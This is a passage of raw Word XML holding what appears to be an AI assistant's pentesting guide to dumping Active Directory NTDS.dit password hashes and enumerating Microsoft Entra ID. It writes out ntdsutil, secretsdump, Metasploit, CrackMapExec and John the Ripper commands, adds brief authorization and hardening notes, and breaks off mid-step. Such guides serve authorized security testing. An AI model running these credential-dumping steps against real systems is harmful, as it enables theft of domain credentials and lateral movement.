            <w:r w:rsidRPr="002B697B">
              <w:t>Empire scripts to inject DLL and dump creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A06761" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Post-exploitation automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19772987" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="791E3EC8">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80D8C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6. Additional Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69089DEF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always ensure you have proper authorization before testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9FC5A6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor Azure Defender and Microsoft Defender for Endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> for suspicious changes to LSA registry or DLL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E3365" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Harden Azure VMs by restricting admin privileges, enabling Credential Guard, and enforcing PowerShell execution policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B6651C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="185B7592">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451BE95" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">If you'd like, I can also summarize how to pentest </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS credential dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Entra ID enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> in a similarly detailed way. Would you want that next?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F094B0B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563"/>
    <w:p w14:paraId="2290DB03" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563"/>
    <w:p w14:paraId="2A2EB8DD" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Got it! Here’s a detailed, corrected, and well-structured guide on </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentesting NTDS credential dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Entra ID enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>, covering step-by-step commands, tools, and Azure VM vulnerabilities exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76C7A8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="07BA1FB5">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D65BE9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Pentesting NTDS Credential Dumping &amp; Microsoft Entra ID Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90D85B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Targets: Windows AD Domain Controllers (NTDS) and Microsoft Entra ID (Azure AD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C8E551" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="0A5F290A">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63120820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Part 1: NTDS Credential Dumping on Azure Windows VMs (Domain Controllers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE9A3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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE89EB" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>The NTDS.dit file stores Active Directory data, including user password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDCBB8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Dumping NTDS enables attackers to extract NTLM hashes, which can be cracked or used for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D3964" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Requires local/system or domain admin privileges or remote credentials with sufficient rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320FB295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Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42BE58" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Access to a Domain Controller (DC) VM or elevated privileges on any domain-joined Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D02FE" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Tools: secretsdump.py (Impacket), Metasploit, NTDSUtil, DSInternals, CrackMapExec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8BFFC" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="7FB626A4">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA0E19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Step-by-step NTDS Dumping Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBAFF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1. Using NTDSUtil &amp; Manual Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAA398" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF2EAA3" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Creates a snapshot of NTDS database (NTDS.dit) and SYSTEM hive in C:\temp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7820691F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Transfer these files securely to your attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DB87C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2. Extract Hashes Using Impacket’s secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B2805" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>On your Kali or attack machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AF96B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F6127" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Extracts NTLM hashes from dumped NTDS and SYSTEM files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134EE27F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3. Using Metasploit Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453E6FF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Find NTDS location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D19BB4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>use post/windows/gather/ntds_location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F24C7" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>set session &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442BEB5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B0C7A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Dump NTDS files and hive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3AA5A6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>use post/windows/gather/ntds_grabber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F19890" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>set session &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D769C30" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A52A90A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Extracted files are transferred in .cab format — use cabextract to unpack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BC90A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4. Remote Hash Dumping via Metasploit auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC4765" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>use auxiliary/scanner/smb/impacket/secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DBC176" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>set rhosts &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99B6F0" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>set smbuser &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C04C1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>set smbpass &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F4BC8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAB3888" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Dumps hashes remotely using valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA4A36E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5. CrackMapExec (CME) Automated Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131E8DA1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>crackmapexec smb &lt;target-ip&gt; -u 'Administrator' -p 'Password123' --ntds drsuapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C04BA" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Dumps hashes via DRSUAPI protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BDFFA1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Efficient for large AD environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610495D5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="09F562C2">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4FE20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Post-Extraction: Hash Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC5BAC2" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> to crack NTLM hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289A99F7" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>john --format=NT hash.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E116B60" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="25DA65A6">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D512921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Azure VM Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA39600" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Misconfigured RBAC or overprivileged accounts with DC access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE74FD" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Insufficient VM isolation allowing session hijacking or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AD279" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Weak credentials allowing SMB/WinRM authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E892727" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Lack of secure secrets management or encryption for NTDS.dit backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAFC9AD" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="467A5B7C">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8C8C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Part 2: Microsoft Entra ID (Azure AD) Enumeration &amp; Pentesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9AD5A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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12034854" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Azure AD holds cloud identities, authentication policies, and role assignments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA7E22" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Enumeration uncovers users, groups, roles, permissions, and potential attack paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC599FE" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Often combined with on-prem AD attacks for hybrid environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB19596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Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4A67D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Valid Azure AD credentials with at least basic directory read permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333BACA" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Tools: AzureAD PowerShell Module, MSOnline Module, az cli, BloodHound Azure AD, Microsoft Graph API, AADInternals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291A5C2" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="5F147724">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890DD2B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Step-by-step Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38817E5B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1. Enumerate Azure AD Users &amp; Groups with Azure CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD94AB0" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>az login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1335C6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>az ad user list --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502E617" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>az ad group list --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41CF2F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2. Using PowerShell AzureAD Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B5F4D9" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Install-Module AzureAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EFA34" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Connect-AzureAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5180C6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-AzureADUser -All $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5E447" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-AzureADGroup -All $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D3420C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3. Enumerate Role Assignments &amp; Privileged Roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99A06C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-AzureADDirectoryRole | foreach { Get-AzureADDirectoryRoleMember -ObjectId $_.ObjectId }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC35CF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-AzureADDirectoryRoleTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E99399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4. Using BloodHound for Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27432535" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Run AzureHound data collector (PowerShell script) to gather identity and role info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F72371" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
